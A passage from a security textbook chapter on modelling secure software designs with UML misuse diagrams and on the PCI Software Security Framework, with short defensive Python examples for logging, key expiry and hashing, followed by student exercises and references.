(e.g., on client or server) [11]. A MisUse Deployment Diagram or MDD


Fig. 23.11  A MisUse Deployment Diagram [14] (Client, Firewall and Registration Server nodes host the Email Response, Packet Filter, Dynamic Webpage, Authorization, Event Logger, Sanitizer and CAPTCHA security components, mitigating the Invalid Registerer/Impersonator, DDOS Attacker, Requester of Doc Root/Googler, SQL Attacker and DOS Attacker misusers)

(Fig. 23.11) in addition shows where security components reside, and the attacks that those security components mitigate. This single diagram is useful in that it easily shows the concrete security deployment, including how attacks can be mitigated across systems [14]. For example, input validation must occur to combat SQL attacks; but if this validation occurs only on the client side, security is inadequate. Therefore, the location of security code is as important as its existence. In Fig. 23.11, the Sanitizer is on the Server side, protecting against an SQL Attack there. In an MDD, Misusers represent general attack types, and the attack name is assigned to the misuser. Packages are shown as folders to represent application subsystems, and as red boxes to represent security components or packages. Figure 23.11 was drawn with Microsoft Visio as a UML Deployment Diagram and serves well as an initial diagram. Figure 23.12 adds security stereotypes for better explanation of the provided security services. Security components for the Register System are described as follows [14]:

• Dynamic web pages: Ensures documents are available only at download time. Server-side programs enforce registration, by requiring users to register their email address.
• Email Response: Users obtain the Dynamic web page via email following registration.
• CAPTCHA: CAPTCHA helps to mitigate automated Distributed Denial of Service attacks.
• Authorization: Used to verify the Provider's login/passwords.


Fig. 23.12  Misuse Deployment Diagram with security stereotypes (the same nodes, security components and misusers as Fig. 23.11, annotated with stereotypes)

• Input sanitization and validation: A server-side program sanitizes all user input from the registration form against input attacks such as cross-site scripting or SQL injection. The program also validates all incoming data.
• Event logging: A server-side program logs any event needing to be tracked, thus providing a record of activity at the web site. Each system module has the ability to write information to the system log. The amount of logging is configurable.
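A minimal sketch of the Event Logger component, using Python's standard logging module with an assumed configuration, shows how each module can write to a shared system log while the amount of logging remains configurable:

```python
import logging

LOG_LEVEL = logging.INFO  # configurable: DEBUG for more detail, WARNING for less

logging.basicConfig(filename="registration.log", level=LOG_LEVEL,
                    format="%(asctime)s %(name)s %(levelname)s %(message)s")

register_log = logging.getLogger("register")    # one logger per system module
sanitizer_log = logging.getLogger("sanitizer")

register_log.info("registration accepted for %s", "user@example.com")
sanitizer_log.warning("rejected input containing SQL metacharacters")
```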

23.3.2 Dynamic Model

The dynamic model may be used to design complex behavior of the classes, components and subsystems defined in the Static Model. The two types of diagrams we will review are the Sequence Diagram and the State Diagram.

23.3.2.1 Sequence Diagrams

Chapter 21, Software Threats, uses ladder diagrams to clearly show how attacks may occur between different entities. These ladder diagrams are drawn similarly to UML sequence diagrams, and in fact some were drawn with a UML sequence diagram tool. UML sequence diagrams show how objects (or class instances) interact with other objects in order to fulfill a use case [11]. Figure 23.13 is an example Sequence Diagram for the Register Use Case.


Fig. 23.13  MisSequence diagram for the register use case model [11]

At the top of the diagram are objects, shown as actor instances or as rectangles listing object names. Conceptually, objects send messages to other objects, shown as labelled arrows between the objects. In practice, messages are method calls or packet transmissions, and the labels represent the method or packet name. Figure 23.13 shows packet transmissions between the actors on the client side and the Register and Download software on the Server side [14]; each arrow represents one packet transmission. In Fig. 23.13, a LegalClient requests the materials using the Request_Info message sent to the Register program. The server's Register program replies with the Request_Register_Form, which the LegalClient completes and sends in as a completed Submit_Register_CAPTCHA_Form. The form data is received by Register, which sanitizes and validates the form data, including verifying the CAPTCHA input. Once the input is validated, Register inserts LegalClient's registration data into the database, together with a newly generated unique key. Register then sends an email to LegalClient's email address, shown in Fig. 23.13 as the message Email_link_and_key. This email contains a link back to the dissemination web site; the link includes an appended unique access key. When the link is clicked by the user, an HTTP_Request_with_Key message is sent to the Download program. The key contained in the packet identifies the user as having previously registered with the web site and serves as a type of password for temporary access to the downloadable files.


Thus, without a valid email, no download occurs. When the Download program receives the key or temporary password, it generates a Dynamic_html_page_with_links for LegalClient. The downloadable files are provided temporarily during the web access and deleted soon after. This minimizes the possibility of non-registrants obtaining the downloadable files. The dynamic web page ensures that search engines will not ordinarily provide access to this page. While Sequence Diagrams generally show normally executing logic, Mis-Sequence Diagrams also show attack handling logic [21]. Attacks are shown as conditional logic, which demonstrates how attacks are received and handled. The Parallel box at the bottom of the diagram shows the normal occurrence in the top half of the box, and the attack in the bottom half, below the dashed line. The Parallel label indicates that the two activities can occur together. In this attack, LegalClient passes the email with link and key to their friend, Illegal:Client, during the one-week duration the key is valid. This is shown as the Email_link_and_key message sent from LegalClient to Illegal:Client, and Illegal:Client's subsequent access to the downloadable data. We have no easy fix for this, but some risk is acceptable in the interest of getting the system up quickly. Similar to other UML diagrams, it is possible to write security stereotypes above object names [4]; we might have included stereotypes on the LegalClient object and above the Download object.

23.3.2.2 State Transition Diagrams

State Transition Diagrams (STDs or State Diagrams) can ensure integrity of real-time processing, thus avoiding incorrect actions when receiving a right input at the wrong time [22]. For example, an ATM money machine will not give you money whenever you ask for it; you must slide your card and enter your PIN first, then you can input the amount of money you would like. Thus, STDs show how one class/object should behave, depending on what state that object is in. STDs can ensure that software retains the proper order of processing, recognizes out-of-sequence steps, and can change behavior based on time or past history. In other words, a well-designed STD can ensure that an object behaves properly in all scenarios. Figure 23.14 is an example STD. STDs have states, shown as rectangles with rounded edges, and transitions, shown as labelled arrows. Any object can only be in one state at a time. The object transitions from one state to another when any of its outgoing transitions is received or becomes true; it then moves to the state where the arrow points. Each state is split into two parts: the top part contains the state name, and the bottom part shows the processing that occurs within the state, which does not cause a transition to a different state. This bottom part describes Events that may be received, and how they are handled. In Fig. 23.14, events include entry/ and do/. The entry/ event indicates that this processing should occur once, on entry to the state.


Fig. 23.14  State transition diagram for client

The do/ text indicates that this processing should occur whenever the described event occurs: in Fig. 23.13, when an HTTP_Request_with_Key is received. In other words, with do/ the described processing can occur multiple times, once per event. Figure 23.14 is a state diagram for the state of a Client. The first state, Registered, is entered upon receipt of a validated Submit_Register_CAPTCHA_form. On entry/ to the Registered state, the Register program saves the registration information and generates the email with an associated key for LegalClient. This is transmitted to LegalClient in the Email_Link_and_Key message, which then sets the new state of LegalClient to Downloadable. In the Downloadable state, the Download program validates the key in the database before sending the Dynamic_HTML_page_with_links. LegalClient stays in the Downloadable state until 1 week expires; then LegalClient transitions to the Download_Expired state. The single remaining transition that can get LegalClient back to the Downloadable state is if the Register program gets another Email_Link_and_Key message for LegalClient. This state diagram ensures legal transactions and processing for any Client object.

The last step is the inspection of the Design. Security experts can help find security flaws before they are coded and deployed. When evaluating a design, multiple heads are better than one. Consider that multiple heads will be attacking your software, and they only need to find one strong vulnerability.
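To tie the dynamic model together, the following sketch combines the Client states of Fig. 23.14 with the unique download key of Fig. 23.13. The implementation details (key length, in-memory storage) are assumptions; the behavior follows the diagram: only the Downloadable state honors HTTP_Request_with_Key, and the key expires after one week:

```python
import secrets
import time

ONE_WEEK = 7 * 24 * 3600

class Client:
    def __init__(self):
        self.state = "Registered"   # entered on a validated registration form
        self.key = None
        self.key_expiry = 0.0

    def email_link_and_key(self) -> str:
        """Email_Link_and_Key: issue a fresh key; transition to Downloadable."""
        self.key = secrets.token_urlsafe(32)
        self.key_expiry = time.time() + ONE_WEEK
        self.state = "Downloadable"
        return self.key             # appended to the emailed link

    def http_request_with_key(self, key: str):
        """do/ event: honored only in the Downloadable state with a live key."""
        if self.state == "Downloadable":
            if time.time() >= self.key_expiry:
                self.state = "Download_Expired"   # timed transition
            elif secrets.compare_digest(key, self.key):
                return "Dynamic_HTML_page_with_links"
        return None   # wrong state, expired key, or bad key: refuse
```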


23.4 Example Secure Design: PCI Software Security Framework

The Payment Card Industry certifies software that handles payment card transactions, based on its framework, the Software Security Framework: Secure Software Requirements and Assessment Procedures [9]. The PCI Security Standards Council has defined requirements that must go into such software, and these design requirements provide an overview of its vision of the security features needed to protect sensitive information. This section briefly outlines those requirements; for full details, the reader is referred to this freely available document. The standard defines four required areas, as well as two modules specific to particular configurations, Modules A and B (not discussed here). This section reviews the four required areas.

The first area, Minimize the Attack Surface, focuses on risk assessment and prioritization. The first part of any risk assessment is to inventory the assets: the card data elements and transactions processed, as well as their information security (CIA) classification. The assets' internal environment must be documented, including how and where each asset is processed (main memory, RAM, flash media vs. disk), its duration of storage, and how and where encryption and third-party software are used. Known vulnerabilities, including those listed in a public vulnerability database, must be mitigated. PCI takes a special interest in the installation process of the software: any default passwords and accounts and any required environmental files must be well-documented and secured both during and after installation. As part of the configuration, any unnecessary services or ports should be removed, including in third-party software. The installation process should be clear on certificate and key installation, replace any default accounts and passwords, define each configuration requirement, and ensure that transaction processing does not begin until the software is fully and properly configured.

Authentication and access control shall implement least privilege (or minimum necessary) for the required roles: e.g., administrators can change configurations but not access sensitive user data. Configurable access control can enable privileges to be tailored to specific roles and persons. Both access control and data storage shall also be restricted to business purpose: e.g., if there is no need to store data, data shall not be stored. Retention of secure information should be as short as possible; after a transaction has been processed, its data should be explicitly cleared to prevent further use or exposure. During any required storage or transmission, strong encryption shall be used, and any keys shall be expunged as soon as possible thereafter. It is important to delete sensitive data from all areas where it may reside: swap space, partitions, and log files; and to prevent side channel leaks, whether in hardware (cache, screen, keyboard) or software (error messages, logs, and memory dumps).

The second area, Software Protection Mechanisms, focuses on features related to authentication, encryption and integrity.


Risk assessment defines the attacks that need to be addressed, including attacks on passwords, encryption, and input. A process flow diagram details where information is input, processed, and sent, including any storage devices, network segments, URLs, static IPs, and related channels, such as environmental or configuration data and authentication flows.

Authentication and access control for specific roles and types of access (local versus remote) should be based on risk assessment. Higher levels of security are required for roles such as system administration, remote access, and roles with access to sensitive data. Roles requiring higher security need multifactor authentication, and all users should require unique logins. Password credentials should be protected and sufficiently complex to prevent guessing, leaking or bypass. For example, biometric devices should not be fooled by a forged copy. Access control models shall protect based on specific roles or identities, with permissions based on allowable access times, enabled attributes, and dynamic decisions based on recent history.

Sensitive data transmitted or stored persistently must be protected by standard encryption and, in some cases, integrity controls. The first requirement is to review all places the data is stored or transmitted, including log files, third-party software and operating system(s). Encrypted sensitive data should be protected by appropriate key-management processes, or by a one-way hash or one-time pad that renders the data unreadable. (A one-time pad is a randomly generated number used once to encrypt and decrypt one transaction.) Encryption algorithms must meet accepted national or international standards, such as NIST, ANSI, ISO or EMVCo. Integrity hash algorithms should also be protected via a quality random number generator, a strong salt, and a reputation for collision resistance.

It is important to thoroughly understand key management processes, to ensure that all parts of this process are strong. One rule is that separate keys must be used for key storage, data encryption, authentication, and even different transactions. The encryption used for key storage must be at least as strong as that used for data encryption, and these two keys must be stored separately. Encryption used for key delivery must be at least as strong as the encryption key being delivered. New keys shall not be generated from old keys, where the generation process could be reversible. An inventory of keys is maintained, including key name, type/length, purpose, location and expiration date (including through third-party software). All secret keys must be at least 128 bits long. Keys shall expire at the end of their crypto-period and shall be retired or replaced thereafter. It is recommended to use two-part key storage for certain keys (e.g., private keys), so that knowledge of both parts is required to recover the full key. Key secrecy is heavily dependent on the quality of the random number generator, its configuration and initialization. Random number generators are characterized by their entropy, which determines the size of the period before random numbers repeat; entropy is also affected by the initialization seed. This PCI standard briefly discusses issues with using passphrases for generating keys and how random number generators are to be tested for sufficiency.
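Two of the controls above can be sketched briefly: rendering stored data unreadable with a salted one-way hash, and generating keys of at least 128 bits from a strong random number generator. The parameter sizes here are illustrative choices, not PCI-mandated values:

```python
import hashlib
import secrets

def salted_hash(sensitive: bytes) -> tuple[bytes, bytes]:
    """One-way: the digest cannot be reversed to recover the data."""
    salt = secrets.token_bytes(16)                      # strong, per-record salt
    digest = hashlib.sha256(salt + sensitive).digest()
    return salt, digest

# Separate keys for separate purposes, each 256 bits (above the 128-bit minimum).
data_encryption_key = secrets.token_bytes(32)
key_storage_key = secrets.token_bytes(32)   # never reused for data encryption
```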


The third area, Secure Software Operations, focuses on logs tracking user actions and incidents. Many events need to be logged, including access to sensitive data and changes in the configuration of sensitive functions (encryption, logging, authentication, privilege escalation). Logging needs to clearly define the action taken, who did it, when they did it, and the critical assets impacted. Integrity of the logs is important: log data should include integrity checks to ensure completeness and accuracy, but also to ensure that the log file never gets overwritten upon restart, overflow or other failures. A main function of logs is recognition of attacks, such as password guessing and changes in configuration following installation. Input rate limiting (slowing down transaction processing) can control password or key brute force attacks. In addition, integrity checks on critical data and software should run at least every 36 hours, and any failures must be recorded.

The fourth area, Secure Software Lifecycle Management, is concerned with the entire software development lifecycle, from risk assessment through deployment. Risk management starts the process, to address and mitigate all potential threats and vulnerabilities and detail their potential impacts. Third-party software can provide trusted software components offering an assurance of stability, but all such software must be carefully evaluated, minimized to required functionality, and if necessary, remediated. Then, automated vulnerability and security testing results in a bug bar threshold that categorizes and prioritizes defects for rapid or eventual remediation.

During and after deployment, patching and managing software updates repairs issues in commercial software. Such updates must be delivered over secured communications (e.g., TLS), with integrity hashing or digitally signed certificates for integrity and authenticity. Release notes can provide hash values to assure software legitimacy, specify the purpose of the fix(es) with installation directions, and discuss workarounds for defects not yet fixed. All release notes and user documentation must clearly state the version to which the documentation applies. Users have methods to view the security status, including which patches are applied and functional, and whether the system considers itself fully secured.

Auditors will examine documentation, confirm code contents, and analyze products using forensic software, memory dumps, and protocol sniffers to ensure that these requirements are met. This includes ensuring that all environmental/configuration files are encrypted, and that no reduction in the strong encryption can be negotiated during transmission. Documentation must clearly and accurately describe all setup requirements (e.g., cryptography libraries, random number generators, and environmental files), all configuration options (including setting account passwords and permissions, and enabling/disabling features), and how to enable a secure state and track its status. This abbreviated outline is not a full checklist of requirements; for the full set of details, please see the PCI Software Security Framework: Secure Software Requirements and Assessment Procedures [9].
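As one possible sketch of the logging requirements in the Secure Software Operations area (an assumed design, not the framework's prescribed format), each log entry records who did what and when, and chains a hash of the previous entry, so that an overwritten or deleted record breaks the chain and is detectable:

```python
import hashlib
import json
import time

_last_hash = "0" * 64   # chain anchor

def log_event(actor: str, action: str, asset: str) -> dict:
    """Append a tamper-evident entry: who, what, when, impacted asset."""
    global _last_hash
    entry = {"when": time.time(), "who": actor, "what": action,
             "asset": asset, "prev": _last_hash}
    _last_hash = hashlib.sha256(
        json.dumps(entry, sort_keys=True).encode()).hexdigest()
    entry["hash"] = _last_hash
    with open("audit.log", "a") as f:
        f.write(json.dumps(entry) + "\n")
    return entry

log_event("admin", "changed logging configuration", "registration server")
```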


23.5 Questions and Problems

1. Vocabulary. Match each meaning with the correct word:

OCTAVE, Layering, Trust, Modularity, Least privilege, State diagram, Misuse case, Threat tree, Open design, Encapsulation, Economy of mechanism, Security use case, Misuse case diagram, Missequence diagram, Least astonishment, Misuse case description, Misuse deployment diagram, Security use case diagram, Psychological acceptability, Least common mechanism

(a) This security requirements process analyzes assets, goals, threats and risks.
(b) Principle: It is important to separate and isolate services from each other, by not sharing devices; also known as minimization.
(c) This programming principle hides class attributes and complex logic behind a class method interface.
(d) A concept stating that to transact, a user must feel they are working with a safe organization, safe network, and safe computer systems.
(e) Principle: If an attacker breaks through one control, they are stopped by a series of other controls.
(f) Principle: Security implementations should not make a resource more difficult to use than an implementation without security.
(g) Principle: The system must be strong enough that even when the attacker knows the code, they cannot break in.
(h) Principle: Security mechanisms should be understandable to users and work effectively within users' activities.
(i) Principle: Security mechanisms should be shared between software systems, to enable optimization and simplicity.
(j) A UML diagram that shows the implementation of attacks and attack handling logic, by diagramming messages (calls or packets) between objects or subsystems.
(k) A UML diagram that shows where security components reside and the attacks that the security components mitigate.
(l) This requirements diagram displays attackers as stick figures and attacks as black ovals.
(m) In a use case diagram, this use case oval is the security action that mitigates the attack.
(n) This table and text describe an attack in a numbered step-by-step description.

2. Case Study: For your selected case study industry, consider application-level threats (e.g., social engineering, fraud) in addition to software-level threats. Then prepare the following diagrams (examples are shown throughout this chapter).


These diagrams can be drawn using Microsoft Visio by selecting "UML Diagram -> More Shapes -> Software and Database -> Software", or you may more simply search for "Use Case Diagram" at the search edit screen.

(a) Risk Analysis Table: The risk analysis process includes defining assets, naming threats to assets, rating the threats and likelihoods, and prioritizing the threats. View Table 23.5 and adjust it for your application.
(b) Misuse Case Diagram: Prepare a Misuse Case Diagram to document potential attacks on your organization. Include valid features (use cases, users) as well as security attacks and vulnerabilities (misusers, misuse cases), with relationships. If using MS Visio, start with a UML Use Case Diagram, then change the colors of misuse cases. Save off your Misuse Case Diagram.
(c) Security Use Case Diagram: This diagram shows how security use cases overcome misuse cases. Start with your Misuse Case Diagram, but save it off as your Security Use Case Diagram before modifying the diagram.
(d) Misuse Deployment Diagram: This diagram includes client and server systems (boxes), and demonstrates where security packages are used to defend against attacks. If using MS Visio, start with a UML Deployment Diagram.
(e) Activity Diagram: Display the logic for the mainstream processing, including writing/reading of data (rectangles), processes (rounded edges), and conditions for branches (diamonds). If using MS Visio, start off with a Basic Flowchart diagram or search for "Activity Diagram".
(f) Threat Tree: For your selected case study industry, prepare a Threat Tree showing a hierarchy of threats to your industry. If using MS Visio, start off with a Brainstorming Diagram.

3. Secure Software Audit: For a PCI DSS incident response case involving a large breach, what documentation should an auditor look for to confirm that the software design follows the PCI DSS Software Security Framework requirements, as listed in this chapter, for the following sections:

(a) Minimize the Attack Surface
(b) Software Protection Mechanisms
(c) Secure Software Operations
(d) Secure Software Lifecycle Management

4. Legal case: For breached credit card data, a PCI DSS inspector arrives to determine whether the PCI DSS Software Security Framework's Minimize the Attack Surface area is properly implemented. A threat tree exists and is identical to those of similar projects, but is not fully implemented. An access control table shows which use cases exist for roles such as cashier, manager and administrator; however, the access control table is not dynamically configurable. An information security design exists, showing which data is stored and transmitted and the required standard for confidential protection. No additional documentation except code exists. It is argued that a bug bar standard exists, and outstanding flaws are below their release standard. What should the PCI DSS inspector


inspect next and recommend for remediation? Provide detailed recommendations and arguments outlining your decision.

23.5.1 Health First Case Study Problems

For each case study problem, refer to the Health First Case Study. The Health First Case Study, Security Workbook and Health First Requirements Document should be provided by your instructor or can be found at https://sn.pub/lecturer-material. Note that the Optional Extensions listed below are extensions to the named case study. It is recommended that you perform the original case study, or at least read it all the way through, before designing the Optional Extensions. Each problem uses the Health First Case Study plus the listed resources:

• Update requirements document to include segregation of duties (resources: Health First Requirements Document)
• Fraud: Combatting social engineering; optional extension: computerizing the disclosure forms (resources: Health First Requirements Document; HIPAA slides or notes)
• Planning for incident response; Optional: software design for incident detection (resources: Health First Requirements Document)
• Defining security metrics; Optional: designing metrics for the requirements doc (resources: Health First Requirements Document)
• Software requirements: Extending UML with MisUse cases (resources: Health First Requirements Document)
• HIPAA: Including privacy rule adherence to requirements document (resources: HIPAA slides or notes; requirements document)
• Application controls: Extending requirements preparation by planning for HIPAA security rule (resources: HIPAA slides or notes; requirements document)

References

1. 2011 CWE/SANS top 25: monster mitigations. http://cwe.mitre.org/19/mitigations.html. Accessed 15 Nov 2014
2. Bryant E, Early J, Gopalakrishna R, Roth G, Spafford EH, Watson K, Williams P, Yost S (2003) Poly2 paradigm: a secure network service architecture. In: Proc. 19th annual computer security applications conference (ACSAC 2003), IEEE, 10 p
3. Smith RE (2012) A contemporary look at Saltzer and Schroeder's 1975 design principles. IEEE Computer and Reliability Societies, November/December 2012


4. Mohsin M, Khan MU (2019) UML-SR: a novel security requirements specification language. In: 2019 IEEE 19th international conference on software quality, reliability and security (QRS), IEEE, pp 342–348
5. Tarala J, Tarala KK (2015) Open threat taxonomy, version 1.1. Enclave Security, Venice, Florida, pp 1–15
6. Deitel HM, Deitel PJ (2002) Java: how to program, 4th edn. Prentice Hall
7. Horstmann C (2003) Computing concepts with C++ essentials, 3rd edn. Wiley, New York
8. PCI (2021) Payment Card Industry (PCI) Software Security Framework: secure software lifecycle requirements and assessment procedures, v 1.1, Feb 2021. www.pcisecuritystandards.org
9. PCI Security Standards Council (2021) Payment Card Industry (PCI) Software Security Framework: secure software requirements and assessment procedures, version 1.1, Apr 2021. www.pcisecuritystandards.org
10. SAFECode (2011) Fundamental practices for secure software development, 2nd edn. Software Assurance Forum for Excellence in Code, 8 February 2011, pp 1–56. www.safecode.org
11. Arlow J, Neustadt I (2005) UML 2 and the unified process, 2nd edn. Pearson Education Inc., Upper Saddle River
12. Woody C, Alberts C (2007) Considering operational security risk during system development. IEEE Secur Priv 5(1):30–35
13. Sindre G, Opdahl AL (2005) Eliciting security requirements by misuse cases. Requir Eng 10(1):120–131, Springer, New York
14. Lincke S, Knautz T, Lowery M (2012) Designing system security with UML misuse deployment diagrams. In: IEEE international workshop on information assurance (IA2012). IEEE
15. Tondel IA, Jensen J, Rostad L (2010) Combining misuse cases with attack trees and security activity models. In: International conference on availability, reliability and security, 15–18 Feb 2010, pp 438–445
16. Sindre G, Opdahl AL (2008) Misuse cases for identifying system dependability threats. J Inf Priv Secur 4(2):3–22, Taylor & Francis Online, http://www.tandfonline.com
17. SANS (2009) Practical risk analysis and threat modeling spreadsheet. http://cyber-defense.sans.org/blog/2009/07/11/practical-risk-analysis-spreadsheet. Accessed 6 Dec 2014
18. Payne RS (2013) A practical approach to software reliability for army systems. In: 2013 Proceedings of the annual reliability and maintainability symposium (RAMS). IEEE, pp 1–5
19. Open Group (2020) Security Forum: CDSA (Common Data Security Architecture). http://www.opengroup.org/security/l2-cdsa.htm. Accessed 26 Jan 2023
20. Peterson MJ, Bowles JB, Eastman CM (2006) UMLpac: an approach for integrating security into UML class design. In: Proc. IEEE SoutheastCon, IEEE, pp 267–272
21. Whittle J, Wijesekera D, Hartong M (2008) Executable misuse cases for modeling security concerns. In: ACM/IEEE 30th international conference on software engineering (ICSE 08), pp 121–130
22. Kong J, Xu D (2008) A UML-based framework for design and analysis of dependable software. In: 32nd IEEE international computer software and applications conference (COMPSAC '08). IEEE, pp 28–31
23. Christey S (2011) 2011 CWE/SANS top 25 most dangerous software errors. 13 September 2011. http://cwe.mitre.org/19
24. Harris S (2013) All-in-one CISSP® exam guide, 6th edn. McGraw-Hill Co., New York, pp 1094–1111
25. Washizaki H (2017) Security patterns: research direction, metamodel, application and verification. In: 2017 international workshop on big data and information security (IWBIS). IEEE
26. BSIMM (2020) Building Security In Maturity Model, version 11, Sept 2020
27. Shostack A (2014) STRIDE. In: Threat modeling: designing for security. Wiley, pp 61–86